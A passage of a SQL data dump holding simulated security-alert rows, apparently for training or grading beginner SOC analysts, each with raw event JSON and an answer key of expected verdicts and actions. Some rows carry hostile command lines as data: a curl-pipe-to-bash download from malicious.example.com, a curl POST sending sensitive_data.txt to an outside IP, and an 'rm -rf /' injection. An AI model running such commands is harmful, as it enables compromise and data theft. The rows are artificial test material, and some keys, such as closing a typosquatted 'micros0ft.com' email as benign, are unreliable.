activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1857, 'Potential Command Injection Attempt Detected', 'high', 'Splunk', 'A potential command injection attempt was detected by a web application firewall. Further investigation is required to confirm the threat.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:50Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.4.100\",\"username\":\"web_user\",\"hostname\":\"web-server\",\"request_body\":\"cmd.exe /c echo vulnerable\",\"command_line\":\"curl -X POST -d \'cmd.exe /c echo vulnerable\' http://192.168.4.100/execute\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"cmd.exe /c echo vulnerable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a known malicious IP and a command injection payload confirms this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1858, 'Routine IT Vulnerability Scan Detected as Brute Force Attack', 'low', 'Splunk', 'A series of login failures were detected from an internal IP address, which is consistent with routine IT vulnerability scanning operations.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:35:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"internal-scanner\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT department for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username commonly used in internal scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity matches routine vulnerability scanning patterns and originates from an internal IP.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1859, 'Authorized Administrative Backup Triggered Malware Alert', 'medium', 'Wazuh', 'A backup script execution was flagged as malware due to its behavior resembling ransomware. Upon analysis, it is an authorized backup operation.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:47:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.20\",\"dst_ip\":\"\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup operation using rsync.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized user for executing backup scripts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command is a legitimate backup operation executed by an authorized user.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1860, 'Misconfigured Legacy Application Causes Suspicious Network Traffic', 'medium', 'Elastic SIEM', 'Network activity from a legacy application was flagged as suspicious due to non-standard communication patterns, which are typical for its outdated protocol.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:12:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.50\",\"username\":\"\",\"hostname\":\"legacy-app-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address receiving data from a legacy application.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This traffic is generated by an outdated protocol from a legacy system, not indicative of an attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1861, 'Benign System Health Check Flagged as Phishing Attempt', 'low', 'Azure Sentinel', 'An email with a URL was flagged as a phishing attempt. After review, it was identified as a system health check email from a trusted vendor.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:58:37Z\",\"event_type\":\"email_received\",\"src_ip\":\"\",\"dst_ip\":\"\",\"username\":\"user1@example.com\",\"hostname\":\"\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"healthcheck@trustedvendor.com\",\"url\":\"https://status.trustedvendor.com/check\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"healthcheck@trustedvendor.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email address belongs to a trusted vendor.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://status.trustedvendor.com/check\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is a legitimate system status page.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL were verified to be from a trusted source and are part of regular system checks.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1862, 'Real Malware Detected by Network Monitoring', 'high', 'Wazuh', 'A suspicious process execution was detected on a workstation. OSINT lookup confirmed malicious activity related to a known malware hash.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:18:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-45\",\"request_body\":\"\",\"command_line\":\"malware_process.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"malware_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in 45/70 antivirus engines as malicious.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious, indicating a malware infection that needs immediate attention.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1863, 'Suspicious Login Attempt from External IP', 'medium', 'Splunk', 'A login attempt was detected from an external IP address commonly associated with brute force attacks. The attempt involved multiple failed login attempts.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"server01\",\"failed_attempts\":12}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 15 times for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP showed suspicious behavior but did not result in a successful login, indicating a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1864, 'Authorized Vulnerability Scan Detected as Potential Attack', 'low', 'Wazuh', 'Routine IT vulnerability scanning activity was flagged as a potential network scan attack. The scan originated from an internal IP.', 'Network Scan', 'T1595', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.25\",\"hostname\":\"vulnscanner\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to authorized vulnerability scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"clean\",\"details\":\"Authorized network scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"The activity was part of scheduled vulnerability scanning, making the alert a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1865, 'Phishing Email Detected from Known Safe Sender', 'medium', 'Azure Sentinel', 'A potential phishing email was detected but originated from a legitimate sender known to the organization.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"email_sender\":\"it-support@trustedcompany.com\",\"hostname\":\"mailserver01\",\"subject\":\"Critical Security Update\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@trustedcompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email sender verified as a trusted source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was sent by a known and trusted sender, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1866, 'Routine Backup Process Misidentified as Malicious Activity', 'low', 'Elastic SIEM', 'A routine backup process executed on the server was mistakenly flagged as malicious due to its network activity.', 'Data Exfiltration', 'T1070', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.35\",\"username\":\"backupadmin\",\"hostname\":\"backup-server\",\"command_line\":\"/usr/bin/rsync -avz /data backup@192.168.1.35:/backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/rsync -avz /data backup@192.168.1.35:/backup\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Command corresponds to scheduled backup task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP is internal backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The process was identified as a backup operation, confirming the alert as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1867, 'Command Injection Attempt Detected in Web Application', 'high', 'Elastic SIEM', 'A web application detected a command injection attempt using a suspicious payload. The source IP is known for launching such attacks.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"webserver01\",\"request_body\":\"rm -rf /; echo hacked\",\"url\":\"/vulnerable_endpoint\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"rm -rf /; echo hacked\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload and IP analysis confirmed an active command injection attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1868, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A series of network connection attempts from an internal IP address were detected, resembling vulnerability scanning activity. The source IP belongs to the IT department.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"it_admin\",\"hostname\":\"IT-Scanner\",\"command_line\":\"nmap -sV 192.168.1.200\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with IT department scanner\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"IT Policy\",\"verdict\":\"clean\",\"details\":\"Routine vulnerability scanning by IT personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This is a scheduled IT security scan, not malicious activity.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1869, 'Unauthorized Login Attempt', 'medium', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP address. The IP is associated with a known VPN service.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"192.168.1.50\",\"username\":\"user123\",\"hostname\":\"AuthServer\",\"failed_attempts\":15}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with VPN service, often used for privacy\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"user123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Active user account with no prior issues\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts are from a known VPN IP, possibly a legitimate user.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1870, 'Suspicious Email with Spoofed Domain', 'medium', 'Proofpoint', 'An email was received from a domain that closely resembles a legitimate partner but is slightly altered.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.7\",\"email_sender\":\"support@micros0ft.com\",\"hostname\":\"MailServer\",\"email_subject\":\"Immediate Action Required\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@micros0ft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles \'microsoft.com\', potential typo-squatting\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email is suspicious due to typo-squatting but does not contain malicious links or attachments.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1871, 'Administrative Backup Detected', 'low', 'Azure Sentinel', 'A scheduled backup operation was detected on a critical server, initiated by an administrative account.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.15\",\"username\":\"backup_admin\",\"hostname\":\"BackupServer\",\"command_line\":\"backup.exe /start /server\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"IP address is part of internal network, used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup.exe /start /server\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command executed by authorized personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected process is a legitimate scheduled backup activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1872, 'Detected Command Injection Attempt', 'high', 'Elastic SIEM', 'A detected command line execution from an external IP contains possible injection commands aimed at a web server.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"185.143.223.12\",\"dst_ip\":\"192.168.1.10\",\"hostname\":\"WebServer\",\"request_body\":\"curl -s http://malicious.example.com | bash\",\"command_line\":\"curl -s http://malicious.example.com | bash\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"curl -s http://malicious.example.com | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The detection of a suspicious command line execution from an external IP is confirmed as a true positive due to its malicious nature.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1873, 'Suspicious Network Activity Detected - Potential C2 Communication', 'medium', 'Zeek', 'Zeek has detected network traffic that resembles command and control (C2) beaconing from an internal IP to an external server. However, further investigation reveals this is routine data synchronization with an external service.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:20:35Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"service_account\",\"hostname\":\"Internal-Server-01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate data sync\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP is associated with a trusted data synchronization service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is verified as a legitimate service, confirming routine activity.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1874, 'Potential Lateral Movement Detected via PSExec', 'medium', 'Corelight', 'Corelight detected internal traffic that resembles lateral movement using PSExec. However, this was confirmed to be an authorized IT operation for system updates.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"Admin-PC\",\"command_line\":\"psexec \\\\\\\\10.0.0.20 -u admin_user cmd\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in authorized IT operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.20 -u admin_user cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used in legitimate system update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Admin activity confirmed as part of routine maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1875, 'Brute Force Login Attempts from Unknown IP', 'medium', 'Suricata', 'Multiple failed login attempts from an external IP were detected. Investigation indicates these attempts were part of a penetration test authorized by IT.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:32:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"test_user\",\"hostname\":\"Test-Server\",\"failed_attempts\":15}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with penetration testing activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"test_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP was verified as part of a planned penetration test.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1876, 'Unusual Data Transfer Detected - Potential Data Exfiltration', 'high', 'Wireshark', 'A large volume of data was transferred to an external IP. Investigation reveals this was part of a legitimate backup process to an offsite location.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:10:05Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"192.0.2.45\",\"username\":\"backup_user\",\"hostname\":\"Backup-Server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a known offsite backup provider\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was confirmed as part of a scheduled backup job.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1877, 'Malicious Command Execution Detected on Internal Network', 'critical', 'Darktrace', 'A suspicious command execution was detected on an internal server, indicating potential compromise. The command is known for data exfiltration activities.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:05:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"45.33.32.156\",\"username\":\"compromised_user\",\"hostname\":\"Compromised-Server\",\"command_line\":\"curl -X POST http://45.33.32.156/exfil --data-binary @sensitive_data.txt\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in confirmed malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for involvement in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -X POST http://45.33.32.156/exfil --data-binary @sensitive_data.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line execution matches known data exfiltration patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command and external IP have been verified as malicious, confirming the server compromise.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1878, 'Suspicious Network Connection Detected - Potential Data Exfiltration', 'medium', 'Zeek', 'A network connection was detected from an internal IP to an external IP known for suspicious activities. This may be a false alarm caused by routine data backup.', 'Data Exfil', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"backup_user\",\"hostname\":\"backup-server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection appears to be part of routine data backup procedures.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, 